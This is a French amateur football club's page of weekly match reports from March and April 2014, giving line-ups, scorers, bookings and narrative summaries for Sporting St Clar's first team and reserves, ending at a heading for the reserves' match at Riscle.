Résultats du week-end (26/04/14):
Les équipes du Sporting engrangent les points à domicile !
Ce week-end, les réservistes recevaient leurs homologues de Pauilhac pour un derby déterminant pour le maintien en Promotion Excellence. Et l’équipe fanion toujours en course pour la montée recevait elle une équipe de L’Isle Jourdain II en besoin de points…
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: ST CLAR II – PAUILHAC: 2-1
Equipe: 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. D. Solagna, 5. F. Auricane, 6. V. Taupiac (Cap), 7. H. Mancey, 8. V. Lucas, 9. C. Maillasson, 10. L. Fabbro, 11. J. Sousa. Rempl: 12. C. Boukkera, 13. T. Hrodej, 14. M. Cros Buts: C.Maillasson (47ème), V.Taupiac (65ème) Avertissements: P.Pinto (Tacle dangereux) Pour ce dernier match de championnat de la saison à domicile, les réservistes avaient à cœur de terminer sur une bonne note et de pratiquement assurer leur maintien par la même occasion. Les jaunes et rouges sont les premiers à se mettre en action dans ce derby, sur un coup franc vite joué sur le côté par la paire “Matt-Bono”, “Bono” centre, le gardien repousse, “José” en embuscade fait une tête mais celle-ci frôle le poteau. Dans la foulée, St Clar obtient un corner, petit cafouillage, “Christo” en renard déclenche une frappe en pivot mais le gardien adverse d’un super réflexe détourne le ballon sur la ligne. Les visiteurs se montrent dangereux sur coups de pieds arrêtés et à la 25ème minute sur un coup franc excentré les joueurs adverses trouvent la faille sur une tête au deuxième poteau, 0-1. S’ensuit une période de doute pour les joueurs du Sporting, où “Lolo” sauvera plusieurs fois les siens surtout sur un coup franc repoussé sur la barre juste avant la mi-temps. Au retour des vestiaires, les réservistes repartent sur de nouvelles bases et sur un coup franc de “Matt”, le gardien Pauilhacais boxe le ballon mais il est contré par un de ses coéquipiers, “Christo” bien placé dans la surface récupère le cuir et l’envoie dans les filets, 1-1. St Clar continue son pressing notamment par un “Taupi” omniprésent en milieu de terrain. Les jaunes et rouges obtiennent un coup franc lointain que “Francou” se charge de bien tirer pour “Taupi” qui d’une tête en arrière dévie le ballon au fond des filets, 2-1. Pauilhac remet le pied sur le ballon et se procure de belles occasions notamment sur un coup franc, mais “Lolo” sort la parade. La défense du Sporting ne lâche rien et se bat sur tous les ballons, même quand “Lolo” est percuté dans une sortie c’est “Dam” qui repousse de la tête une balle qui partait au fond des filets. Juste avant la fin de la rencontre, dernière frayeur sur un corner adverse où la tête du défenseur frôle la lucarne de “Lolo”. Délivrance au coup de sifflet final et grosse solidarité des joueurs réservistes pour arracher cette victoire lors de ce derby joué dans un excellent état d’esprit. Le pari du maintien en Promotion Excellence est pratiquement réussi. Prochain match mercredi à Vic Fezensac II à 21h puis samedi à Lectoure.
CHAMPIONNAT D’EXCELLENCE: ST CLAR – L’ISLE JOURDAIN II: 2-1
Equipe: 1. Bap.Péotta, 2. C. Suzes, 3. A. Thomeret, 4. Benj. Péotta, 5. B. Sabarros, 6. A. Jeangrand, 7. C. Malateste, 8. N. Armengol, 9. N. Cantaloup, 10. L. Delavat, 11. C. Metge. Rempl: 12. A. Serra, 13. S. Portillo, 14. R. Boukkera. Coach: J.Blancard Buts: N.Armengol (5ème) (80ème) Avertissements: C.Metge (Geste d’humeur), R.Boukkera (Tacle dangereux) Face à un adversaire en besoin de points pour le maintien, les joueurs de l’équipe fanion entament le match tambour battant et sur l’une des premières occasions, “Chamako” sur son côté repique plein axe et d’un tir croisé loge le ballon dans le petit filet, 1-0. St Clar continue son pressing mais sur une errance défensive, l’attaquant adverse se lance dans une série de dribbles et trouve un de ses coéquipiers qui marque, 1-1. Les jaunes et rouges repartent de l’avant mais ils se heurtent sur une équipe de L’Isle Jourdain bien en place quand c’est pas leur gardien qui sort les parades devant “Chamako” ou “Clem”. La mi-temps est atteinte sur ce score de parité. Au retour des vestiaires, les St Clarais ont la première grosse occasion, “Ludo” part en profondeur et décale “Nico” qui bute face au gardien. Le milieu de terrain animé par “Adri” et “Kinou” est très actif et efficace mais le dernier geste fait toujours défaut. Les joueurs adverses procèdent par contre et sur quelques actions vont faire avoir quelques sueurs froides aux supporteurs locaux. On s’approche de la fin du match, “Papy” se charge de tirer un coup franc excentré et au milieu des défenseurs adverses, “Chamako” surgit pour couper la trajectoire et propulser le ballon du bout de son crampon au fond des filets, 2-1. L’Isle Jourdain aura un sursaut d’orgueil mais le bloc défensif des joueurs du Sporting gérera les dernières minutes de cette rencontre au mieux. Victoire importante qui permet aux St Clarais de rester en embuscade derrière le leader Vallée de l’Arrats. Prochain match, samedi prochain à domicile contre Gimont II.
“Adri” et “Kinou” très actif en milieu de terrain contre L’Isle Jourdain II
Résultats de la semaine (16/04/14) et du week-end (19/04/14):
Les réservistes se réveillent et l’équipe fanion en embuscade !
Mercredi 16 avril, les réservistes jouaient un match de championnat en retard contre St Sauvy et le week-end suivant ils recevaient dans la foulée Mirande II, deux matchs importants pour le maintien. L’équipe fanion quant à elle recevait Eauze le week-end dernier, un concurrent direct à la montée !
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: ST CLAR II – ST SAUVY: 2-2
Equipe: 1. L. Gamot, 2. C. Suzes, 3. M. Berto, 4. PM. Sabarros, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. H. Mancey, 8. T. Hrodej, 9. C. Metge, 10. A. Jeangrand, 11. V. Lucas. Rempl: 12. P. Pinto, 13. A. Serra, 14. J. Lasserre Buts: V.Lucas (25ème), J.Lasserre (35ème) Avertissements: T.Larribeau (Tacle dangereux), A.Jeangrand (Contestation) Pour ce match en retard, les réservistes étaient opposés à une équipe de St Sauvy bien ancrée en milieu de tableau. Le match commence difficilement pour les rouges et jaunes, au bout de 10mn de jeu sur une passe en retrait “Cissou” lobe malencontreusement “Lolo”, 0-1. Mais les St Clarais refont surface et quelques minutes plus tard sur un joli travail et un centre de “Clem”, “Bono” vient tromper le gardien de près, 1-1. Les réservistes continuent leur pressing et sur un coup franc excentré de “Matt”, “Pampouille’ d’une tête piquée vient tromper le gardien adverse, 2-1. Les joueurs adverses seront plusieurs fois dangereux mais “Lolo” sortira les parades. Mi-temps. Au retour des vestiaires, “Pampouille” bien servi par “Clem” à la balle du 3-1 au bout du pied mais il rate son face à face de peu avec le gardien. Les joueurs du Sporting baissent de régime et les joueurs adverses enclenchent le turbo, la défense St Claraise et la chance par moment permettent de conserver le score. Il faut attendre les longs arrêts de jeu et la 98ème minute, pour voir St Sauvy égaliser suite à un coup franc que l’attaquant adverse a bien suivi, 2-2.
“Bono” auteur du but égalisateur
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: ST CLAR II – MIRANDE II: 3-0
Equipe: 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. D. Solagna, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. H. Mancey, 8. T. Hrodej, 9. R. Boukkera, 10. Y. Abdou, 11. V. Lucas. Rempl: 12. C. Maillasson, 13. J. Sousa, 14. C. Boukkera Buts: R. Boukkera (46ème), V. Taupiac (55ème), Y. Abdou (70ème) Avertissements: Face à une équipe Mirandaise composée de seulement 11 joueurs, les réservistes du Sporting attaquent tambour battant le match, notamment par “Yass” et ses percées et par “Robi” très remuant. “Christo” se bat au front de l’attaque pour empêcher les premières relances et son travail paient, plusieurs ballons sont interceptés mais le dernier geste fait défaut. Mirande est tout près d’ouvrir le score sur corner mais un joueur adverse détourne le tir de son coéquipier sur la ligne. “Yass” suite à une passe de “Robi” se retrouve seul face au gardien mais son tir est stoppé. La mi-temps sera atteinte sur ce score de parité, 0-0. Au retour des vestiaires, sur un long dégagement de “Lolo”, “Robi” tente un tir en cloche, le gardien surpris par le rebond ne peut rien faire et le cuir se retrouve au fond des filets, 1-0. Les joueurs adverses marquent le coup physiquement, et “Yass” en profite pour dynamiter le jeu et sur une de ses percées il est fauché en pleine surface, penalty que “Taupi” transforme, 2-0. Les attaques s’enchaînent, “Bono” sur son côté envoie un missile qui vient s’écraser sur le poteau. Encore lui “Bono” lancé comme un frelon en profondeur arrive dans la surface drible le gardien mais celui-ci le percute, pénalty que “Yass” transforme sans trembler, 3-0. Un dernier but sera marqué par “Christo” mais refusé logiquement suite à une main de “Tom” sûrement encore sur son nuage suite à son exploit technique réussi quelques minutes auparavant (virgule, petit pont). Victoire importante pour les réservistes dans la course au maintient, encore un petit effort à fournir samedi lors du derby contre Pauilhac.
“Capitaine Taupi” a mis fin à la malédiction des pénaltys en transformant le sien
CHAMPIONNAT D’EXCELLENCE: ST CLAR – EAUZE: 2-0
Equipe: 1. Bap. Peotta, 2. C. Suzes, 3. B. Sabarros, 4. PM. Sabarros, 5. Benj. Peotta (Cap), 6. JF. Jouet, 7. C. Malateste, 8. C. Metge, 9. N. Armengol, 10. N. Cantaloup, 11. L. Delavat. Rempl: 12. A. Jeangrand, 13. A. Serra, 14. A. Virelaude Buts: N.Armengol (55ème), N.Cantaloup (60ème) Avertissements: Les St Clarais rentrent directement dans leur match et se créent les premières occasions mais leurs derniers gestes sont trop approximatifs pour ouvrir le score. Eauze procède en contre et sur l’un d’eux, l’attaquant adverse bien lancé en profondeur enlève trop sa frappe pour inquiéter “Bats”. Sur un coup franc excentré des visiteurs, une tête au second poteau est tout près de faire mouche, mais elle passe à côté. Les joueurs de l’équipe fanion se réveillent et poussent un peu plus leurs actions. “Kinou” sur un coup franc au 25m touche le montant après que le goal détourne sa frappe. La mi-temps sera atteinte sur ce score de parité, 0-0. Au retour des vestiaires, “Benben” perce sur son côté et s’écroule dans la surface après un contact, pénalty que “Chamako” transforme sans problème, 1-0. Dans la foulée, “Chamako” sert “Nico” bien partit en profondeur et vient marquer le but du break, 2-0. St Clar continue à pousser notamment par leurs jeunes gardes du Sporting “Adri” et “Clem” en milieu de terrain. Eauze essaye de s’approcher du but de “Bats” mais la paire “Papy-Bernard” reste intraitable. “Cissou” repositionné latéral droit depuis plusieurs matchs multiplie les courses qui apportent le danger dans la surface. Plus rien ne sera marqué dans cette rencontre, une victoire précieuse face à un adversaire direct qui n’aura jamais fermé le jeu dans cette rencontre. Prochain match samedi à 20h30 contre L’Isle Jourdain II en lutte pour le maintient.
“Chamako” décisif dans ce match avec 1 passe décisive et 1 but à son actif
Résultats du week-end (12/04/14):
Un week-end mitigé pour les équipes du Sporting !
Ce week-end, les deux équipes du Sporting étaient en déplacement. L’équipe fanion rendait visite au voisin Fleurantin pour le derby lomagnol et les réservistes se déplaçaient à Duran pour une rencontre délicate et acharnée pour le maintien.
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: DURAN – ST CLAR II: 1-1
Equipe: 1. L. Gamot, 2. M. Berto, 3. C. Suzes, 4. PM. Sabarros, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. H. Mancey, 8. T. Hrodej, 9. C. Metge, 10. A. Jeangrand, 11. V. Lucas, Rempl: 12. P. Pinto, 13. A. Serra, 14. J. Sousa. Coach: C. Boukkera But: H.Mancey (30ème) Avertissements: PM.Sabarros (Geste d’humeur), H.Mancey (Fautes à répétition) Le match commence doucement, les deux équipes se concentrent à bien respecter les consignes de leur entraineur respectif. Les joueurs locaux sont les premiers à se mettre en action, sur un long ballon, “Lolo” sort mais l’attaquant est plus rapide mais sa frappe passe à côté des buts. Les joueurs du Sporting essayent de poser le jeu et de passer par les côtés mais les occasions se font rares. Les locaux eux usent de longs ballons vers leurs attaquants rapides et il faut plusieurs fois toute la vigilance de “Lolo” ou l’aide du poteau pour anéantir les actions. A la demi heure de jeu, “Tom” récupère un ballon sur son côté droit et le transmet à “Riton qui de 25m du gauche envoie une frappe en pleine lucarne, 0-1. Les jaunes et rouges prennent confiance et développent leur jeu, “Bono” part en drible sur son côté gauche, rentre dans la surface et s’écroule, mais l’arbitre ne siffle pas, malgré une faute flagrante. On s’approche de la mi-temps, sur une nouvelle balle en profondeur, l’attaquant local excentré dans la surface en lutte avec “Narbet” centre et s’écroule, l’arbitre décide de siffler pénalty après un long moment d’hésitation…”Lolo” est pris à contre pied, 1-1. Mi-temps. Au retour des vestiaires, les St Clarais sous l’impulsion de leur coach “Bouki” continuent leur pressing, “Cissou” à plusieurs fois l’occasion de marquer mais le dernier geste est trop approximatif. “Clem” aura aussi de belles occasions mais la chance n’est pas de son côté ce soir là. Les visiteurs auront quelques occasions dues à la maladresse de la défense du Sporting mais ils rattraperont toujours leurs erreurs au dernier moment. En fin de match suite à une série de drible “Adri” arrêté illégalement près de la surface, aura l’occasion de se venger lui même, mais le gardien sortira la parade sur sa frappe qui filait au fond des buts. Plus rien ne sera marqué dans ce match joué dans un excellent état d’esprit malgré l’enjeu de la rencontre. Prochain match mercredi face à St Sauvy à St Clar, victoire impérative dans ce match en retard pour prendre des distances avec la zone de relégation.
“Coach Bouki” à décider de prendre du recul pour cette fin de saison mais reste très apprécié par ses joueurs…
CHAMPIONNAT D’EXCELLENCE: FLEURANCE II – ST CLAR: 1-1
Equipe: 1. Bap. Péotta, 2. B. Sabarros, 3. R. Clavel, 4. F. Larribeau, 5. Benj. Péotta, 6. JF. Jouet (Cap), 7. A. Virelaude, 8. L. Delavat, 9. N. Armengol, 10. Y. Abdou, 11. A. Thomeret, Rempl: 12. N. Cantaloup, 13. R. Boukkera, 14. C. Malateste. Coach: J.Blancard But: N.Armengol (50ème) Avertissement: Dans ce cour déplacement, Saint-Clar entame bien le match et se procure deux occasions par “Ludo” de la tête puis par “Yass”, dont le lob rase le poteau. Ils se laisseront ensuite enfermer dans un faux rythme et la pause sera atteinte sur le score de 0 à 0. Dès la reprise, les jaunes et rouges accélèrent le rythme et, bien lancé en profondeur, “Chamako” ouvre la marque. Fleurance semble marquer le pas et, tour à tour, “Chamako”, “Ludo” ou “Yass” se procureront plusieurs occasions mais sans parvenir à conclure. Au contraire, à 5 minutes du terme, sur un coup franc anodin, les locaux parviennent à égaliser et auraient même pu l’emporter sans un sauvetage miraculeux de “Bats”.
“Chamako” meilleur buteur du club
Résultats du week-end (29/03/14):
L’équipe fanion confirme son regain de forme tandis que les réservistes s’enfoncent dangereusement !
Ce week-end, un invité surprise était de la partie, le vent ! Dans des conditions délicates à la pratique du football, les réservistes recevaient Riscle dans un match important en vue du maintien. Et l’équipe fanion recevaient quant à elle Pavie II, dont le match du week-end dernier s’était soldé sur un match nul.
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: ST CLAR II – RISCLE: 1-2
Equipe: 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. F. Auricane, 5. PM. Sabarros, 6. JF. Jouet (Cap), 7. H. Mancey, 8. C. Suzes, 9. A. Serra, 10. C. Maillasson, 11. V. Lucas, Rempl: 12. A. Jeangrand, 13. J. Sousa, 14. T. Larribeau. Coach: C. Boukkera But: M.Berto (60ème) Avertissements: PM.Sabarros (Faute grossière), T.Larribeau (Faute grossière) Que dire sur ce match, à part que la déception est grande…Tout d’abord un premier point sur l’infirmerie: Un bon rétablissement à “Micka” qui s’est fracturé le péroné la veille à l’entraînement et un bon rétablissement à “Francou” sortit sur blessure en cours de match, courage les gars ! Passons au résumé du match, sous un vent terrible mais pas seulement que pour le 11 St Clarais, les erreurs de début de saison se répètent encore et encore, but dès les premières minutes du match par l’élément le plus dangereux de Riscle, c’est pas la faute de Coach “Bouki” d’avoir prévenu ses joueurs sur ce danger. Quelques instants plus tard pénalty concédé bêtement…même si le tireur dut s’y reprendre à 3 fois sous les ordres de l’arbitre, la sentence est logique. La réduction du score en deuxième période par “Matt” avec l’aide d’un défenseur adverse et le pénalty raté en fin de match par “Bono” ne changera pas la vision des choses sur un match important pour le maintien face à un adversaire direct de ce calibre et de plus à la maison…Dernier point, RAPPEL pour ceux qui ont des pertes de mémoire: Les entraînements se déroulent chaque semaine le mardi à 19h30 et le vendredi à 19h30 aussi, le maintien en passera par là sinon la relégation sera proche en fin de saison…
Bon rétablissement à “Micka” à droite sur la photo
CHAMPIONNAT D’EXCELLENCE: ST CLAR – PAVIE II: 3-1
Equipe: 1. Bap. Péotta, 2. R. Boukkera, 3. B. Sabarros, 4. F. Larribeau, 5. Benj. Péotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. N. Armengol, 9. N. Cantaloup, 10. Y. Abdou, 11. A. Thomeret, Rempl: 12. L. Delavat, 13. C. Metge, 14. R. Clavel. Coach: J.Blancard Buts: A.Thomeret (35ème), (70ème), L.Delavat (85ème) Avertissement: Avec des conditions climatiques difficiles, les joueurs du Sporting sont les premiers à se mettre en action avec l’aide du vent. Mais au bout de 15mn de jeu sur un contre, l’attaquant adverse décoche une frappe que “Bats” détourne, le ballon retombe dans les pieds d’un joueurs Paviens qui au 25m libre de tout pressing envoie le ballon dans le petit filet, imparable, 0-1. Piqués au vif les St Clarais partent à l’attaque mais le dernier geste fait défaut. “Mouss” après avoir reçu le ballon en plein visage doit quitter ses partenaires pour l’hôpital, nez sûrement cassé et partenariat en vue pour le Sporting avec le CHU d’Auch (“Micka” opéré le matin même de sa fracture, “Francou” direction Auch au match des réservistes et maintenant “Mouss”). Les joueurs du Sporting poussent et les coups de pied arrêtés de “Jeantho” se multiplient et à la 35ème mn sur un coup franc excentré, il envoie le ballon en pleine lucarne, 1-1. Malgré quelques occasions par “Chamako” et “Yass” la mi-temps sera atteinte sur ce score de parité, 1-1. Après la pause citron, les St Clairais jouent contre le vent et tout le monde se dit que ça va être compliqué. Au contraire, les joueurs de l’équipe fanion posent le jeu et multiplient les passes et les espaces se libèrent. Tandis que les joueurs adverses envoient de longs ballons que “Bats” négocie très bien. On a dépassé l’heure de jeu et “Jeantho” en maître artificier envoie un coup franc excentré sur le gardien qui propulse maladroitement le cuir au fond grâce au pressing de “Kiko” et “Chamako”, 2-1. St Clar continue sur sa lancée, “Ludo” grâce à ses déviations apporte le danger dans les 30 derniers mètres. “Yass” et ses percées plein axe est un danger permanent. On s’approche de la fin du match, quand “Clem” sur son côté droit s’arrache et centre en retrait pour “Ludo” qui ne se fait pas prier pour faire trembler les filets, 3-1. Juste avant la fin, “Chamako” bien lancé en profondeur évite la sortie du gardien à son encontre et dans un angle fermé tire mais le ballon s’écrase sur le montant. Plus rien ne sera marqué dans cette rencontre, bon match malgré les conditions et bon esprit de groupe des joueurs du Sporting. Cette victoire permet de rester au contact du leader Vallée de l’Arrats qui sera en visite le week-end prochain au Stade de Labarthète de St Clar pour un match qui s’annonce passionnant et déterminant pour la fin de la saison…
“Ludo” retrouve le chemins des filets, de bon augure avant la réception du leader
Résultats du week-end (22/03/14):
Les réservistes en 1/2 de la Coupe et l’équipe fanion sur une pente ascendante !
Ce week-end les réservistes recevaient Duran II en Coupe des Réserves avec l’opportunité d’accéder au 1/2 finale. Tandis que les joueurs de l’équipe fanion jouaient un match en retard délicat à Pavie II récent vainqueur de Vallée de l’Arrats leader d’excellence.
1/4 DE FINALE COUPE DES RESERVES: ST CLAR II – DURAN II: 1-0
Equipe: 1. P. Pinto, 2. M. Berto, 3. M. Xompero, 4. F. Auricane, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. JF. Jouet, 8. T. Hrodej, 9. V. Lucas, 10. C. Suzes, 11. R. Boukkera, Rempl: 12. L. Gamot, 13. J. Sousa, 14. C. Maillasson. Coach: C. Boukkera But: T.Hrodej (60ème) Avertissement: PM.Sabarros (Tacle dangereux) Le début du match commence tambour battant, les réservistes partent à l’attaque notamment par “Cissou” très en jambe et “Bono”. A la 20ème minute, sur un ballon en profondeur, “Bono” part dans le dos de la défense et se retrouve face au gardien mais son tir heurte le poteau. St Clar continue son pressing, les corners se multiplient, sur l’un deux “Robi” d’une frappe puissante croit ouvrir le score mais un défenseur adverse détourne sur la ligne. “Francou” y va aussi d’une tête mais celle-ci frôle le poteau. Les attaques de Duran sont rares, la défense du Sporting bien menée par “Bernard” anéantissent les actions. Malgré une nette domination, la mi-temps est atteinte sur ce score de parité: 0-0. Au retour des vestiaires, le jeu devient plus haché, les fautes se multiplient mais l’arbitre ne bronche pas ce qui a le don d’énerver les joueurs. A l’heure de jeu, sur un ballon en hauteur de “Matt” à l’entrée de la surface, “Cissou” et “Tom” sont au duel avec un joueur adverse, le cuir retombe, “Tom” tire et le ballon file au fond des filets, 1-0. St Clar continue son pressing, tout d’abord par “Francou” sur coup franc qui inquiète le gardien et “Cissou” d’une frappe du gauche mais celle-ci est trop enlevée. La fin du match sera marqué par la sortie sur blessure de “Francou” ce qui aura le don d’exciter les 22 acteurs. “Titcho” gardien de dernière minute devra s’employer sur quelques dernières actions mais plus rien ne sera marqué dans la rencontre. Victoire 1-0 des Réservistes qui se qualifient pour les 1/2 finales. Prochain match , samedi prochain contre Riscle à St Clar, un match important en vue du maintien….
“Titcho” gardien de dernière minute hier soir avec une mentalité et un investissement irréprochable
CHAMPIONNAT D’EXCELLENCE: PAVIE II – ST CLAR: 1-1
Equipe: 1. Bapt. Peotta, 2. A. Virelaude, 3. B. Sabarros, 4. F. Larribeau, 5. Benj. Peotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N.Cantaloup, 10. N. Armengol, 11. A. Thomeret, Rempl: 12. C. Metge, 13. M. Sameke, 14. B. Poaragnimou. Coach: J.Blancard But: F. Moussaron (55ème) Avertissement: Le début du match est équilibré entre deux équipes joueuses qui combinent bien et tentent d’écarter le jeu. A la 20ème minute, Pavie obtient un coup franc. le tireur dépose le ballon au premier poteau et le ballon dévié par l’attaquant local (ou par “Papy” ?) finit sa course au fond des filets. Les jaunes et rouges ne se découragent pas et se montrent plusieurs fois pressants devant le but pavien. “Mouss” est tout prêt d’égaliser suite à un ballon mal dégagé par la défense pavienne, mais sa reprise passe au dessus. Juste avant la pause, suite à un corner, sur un cafouillage de la défense, les Saint-Clarais ne parviennent pas à conclure. Dès l’entame du second acte, Saint-Clar écarte bien le jeu, permettant à “Jeantho” et “Ludo” de déborder et d’adresser plusieurs centres qui, malheureusement, ne trouvent pas preneurs. A la 55ème minute, “Nico”, bien lancé en profondeur, devance le gardien local qui le déséquilibre et concède un pénalty. “Mouss” se charge de le transformer et permet à son équipe d’égaliser. Les visiteurs continuent d’attaquer mais sans parvenir à trouver la faille dans la défense adverse. “Chamako” est tout prêt de scorer après avoir dribblé le gardien, mais sa reprise, en angle très fermé, finit à l’extérieur du petit filet. Pavie réplique par de rapides contre attaques mais la défense du Sporting est vigilante avec en particulier un “Benben” intraitable dans son couloir. Ce match nul laisse quelques regrets en regard de la prestation des jaunes et rouges, mais aussi quelques espoirs avec un fond de jeu retrouvé. Nul doute que samedi prochain, face à ces mêmes paviens, nos joueurs feront tout pour concrétiser ces bonnes intentions.
“Benben” intraitable dans son couloir
Résultats du week-end (15/03/14):
L’équipe fanion se relance à Miradoux et les Réservistes accrochent leurs premiers points à l’extérieur
A Miradoux, l’équipe fanion a mis fin à sa mauvaise série (entamée justement lors du match aller contre ces mêmes adversaires) en s’imposant lors du derby. Tandis que les Réservistes sont allés glaner à Ordan Larroque leurs premiers points à l’extérieur de la saison.
CHAMPIONNAT D’EXCELLENCE: MIRADOUX – ST CLAR: 1-5
Equipe: 1. Bap. Peotta, 2. B. Sabarros, 3. R. Clavel, 4. F. Larribeau, 5. Benj. Peotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Cantaloup, 10. N. Armengol, 11. L. Fabbro, Rempl: 12. A. Virelaude, 13. C. Metge, 14. C. Malateste, Coach: J.Blancard Buts: N. Armengol (2), C. Metge (2), F. Moussaron Avertissements: Y. Abdou, C. Metge, C. Malateste Face au vent, nos rouges et jaunes prennent le match en main et mettent rapidement les défenseurs Miradouzains en difficulté, les obligeant à commettre plusieurs fautes. Dès la 9ème minute, c’est « Lolo » qui fait les frais d’une faute particulièrement grossière qui le contraint à sortir avec une cheville très abimée. Très peu de temps après c’est « Chamako » qui ouvre la marque d’une belle tête au second poteau. Ce but a le don de réveiller les locaux qui, petit à petit, rééquilibrent le match qui reste engagé. D’ailleurs, sur un contact appuyé, c’est au tour de « Raphy » de laisser sa place à « Palof ». Les percées de « Yass » ou les débordements de « Ludo » sont régulièrement anéantis par des adversaires coriaces ou par un terrain très bosselé qui complique chaque geste technique. La fin de première période est un peu difficile pour les Saint-Clarais face à des adversaires qui s’enhardissent. Après la pause, Saint-Clar profite du vent et accroit sa domination. Sur un coup franc à 40m, « Papy » tente sa chance de loin d’une frappe bien tendue qui rase le poteau adverse. 5mn plus tard, dans la même position, il récidive et « Clem », attentif, détourne la frappe dans le but. Sur leur lancée, les rouges et jaunes continuent à pousser et c”est le capitaine « Mouss » qui triple la mise. A 3 à 0, les nôtres se relachent un peu, reculent face aux offensives et sur un coup-franc excentré, l’attaquant Miradouzain s’élève plus haut que tout le monde et trompe « Bats » d’une superbe tête. Heureusement, « Chamako » ne laisse pas les locaux espérer trop longtemps en ajoutant un 4ème but avant que « Clem », en toute fin de match ne tue tout suspense. Une victoire qui fait beaucoup de bien dans les têtes mais aussi au classement. En effet, avec la première défaite de Vallée de l’Arrats et le nul à domicile de Sud Astarac, le Sporting revient dans le quatuor encore en course pour le titre.
Bon rétablissement à “Lolo” sorti au bout de 9mn et pas épargné par les blessures cette saison…
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: ORDAN LARROQUE – ST CLAR II: 1-1
But: R.Boukkera A Ordan Larroque, les Réservistes ont enfin glané leurs premiers points en déplacement au terme d’un match de qualité très moyenne. Les visiteurs dominent légèrement le début de match mais se font contrer et se retrouvent mener 1 à 0 à la pause. En seconde période c’est “Robi” qui égalise pour Saint-Clar mais les rouges et jaunes ne sauront pas profiter de leur meilleure condition physique pour engranger une victoire qui était à leur portée. Prochain match, samedi 22 mars à St Clar en 1/4 de Finale de la Coupe des Réserves face à Duran II évoluant deux divisions en dessous des joueurs du Sporting.
“Robi” auteur du but égalisateur
Résultat du week-end (08/03/14):
Quand ça veux pas, ça veux pas !
Ce week-end seule l’équipe fanion était en déplacement, le match des réservistes à Vic-Fezensac II étant reporté. Pour ce déplacement au Houga, récent vainqueur à Eauze, l’équipe du Sporting se devait de ramener un résultat…
CHAMPIONNAT D’EXCELLENCE: LE HOUGA – ST CLAR: 1-1
Equipe: 1. Bap. Péotta, 2. B. Sabarros, 3. R. Clavel, 4. F. Auricane, 5. Benj. Péotta, 6. F. Larribeau, 7. F. Moussaron (Cap), 8. C. Suzes, 9. N. Cantaloup, 10. N. Armengol, 11. L. Fabbro. Rempl: 12. H. Mancey, 13. M. Berto, 14. C. Malateste, Coach: J.Blancard But: N.Armengol (13ème) Avertissement: C.Suzes (Tacle dangereux) Pour ce déplacement au Houga, “Coach Julien” a du faire des changements de dernière minute dans son groupe…”Jeantho” et “Ludo” blessés à l’entraînement la veille. Sur une pelouse de bonne facture, St Clar attaque tambour battant notamment par “Cissou” appelé du dernier instant qui déboule sur son côté droit et obtient un corner. Corner bien tiré par “Lolo” qui trouve la tête de “Chamako” au second poteau mais un défenseur local sauve les siens sur la ligne. Les joueurs du Sporting continuent leur pressing et sur un nouveau corner bien tiré par “Lolo” encore une fois, “Chamako” au second poteau envoie le ballon dans les filets, 0-1. Le match se joue sur un bon rythme, les joueurs du Houga refont surface et sur un joli mouvement, l’attaquant local décalé sur le côté enlève trop sa frappe au dessus des buts de “Bats”. Les St Clarais grâce à la vitesse de “Chamako” se procurent de belles opportunités de doubler la mise mais la réussite ou le goal local anéantissent les occasions. A la demi heure de jeu sur un énième ballon en profondeur des joueurs du Houga, une mésentente de la défense St Claraise permet à l’attaquant local de remettre les siens à égalité, 1-1. La paire “Mouss-Fabien” est très active en milieu de terrain et ratisse pas mal de ballons mais le dernier geste fait toujours défaut en attaque. Dans les dernières minutes de cette première période Le Houga accentue son pressing sur les buts de “Bats” en enchainant les corners mais ils ne trouvent pas la faille. Mi-temps: 1-1. Après la pause citron, les jaunes et rouges sont les premiers à se montrer dangereux, sur un dégagement de “Bats”, la défense du Houga se troue et “Nico” récupère le cuir, s’avance face au gardien sortit au 18m mais loupe son lob. Le jeu devient plus haché, le ballon finissant le plus souvent en touche plutôt que sur l’aire de jeu. A 20mn de la fin “Cissou” réveille tous le monde avec un magnifique extérieur du droit qui s’écrase sur le poteau laissant le gardien sans réaction. Les joueurs du Sporting continuent leur pressing mais ni “Kinou” et “Lolo” ne forcent le verrou vert et blanc. On s’approche de la fin du match, sur un corner de “Lolo” , “Chamako” encore lui décoche une tête qui vient s’écraser sur la barre. Quelques minutes après cette dernière action, l’arbitre sifflera la fin du match sur ce score de parité 1-1. Malgré une nette domination, la réussite a fui les joueurs de l’équipe fanion. Week-end prochain déplacement à Miradoux pour le derby…en espérant que la réussite soit du bon côté parce que quand ça veux pas, ça veux pas.
Les joueurs du Sporting au Houga
Résultat du week-end (02/03/14):
Un retour au championnat difficile pour les Réservistes !
Pour ce retour au championnat, les Réservistes du Sporting se déplaçaient à Riscle, une équipe invaincue sur sa pelouse et des joueurs St Clarais toujours à la recherche d’un résultat positif à l’extérieur depuis le début de la saison…
CHAMPIONNAT DE PROMOTION D’EXCELLENCE: RISCLE – ST CLAR II: 2-1
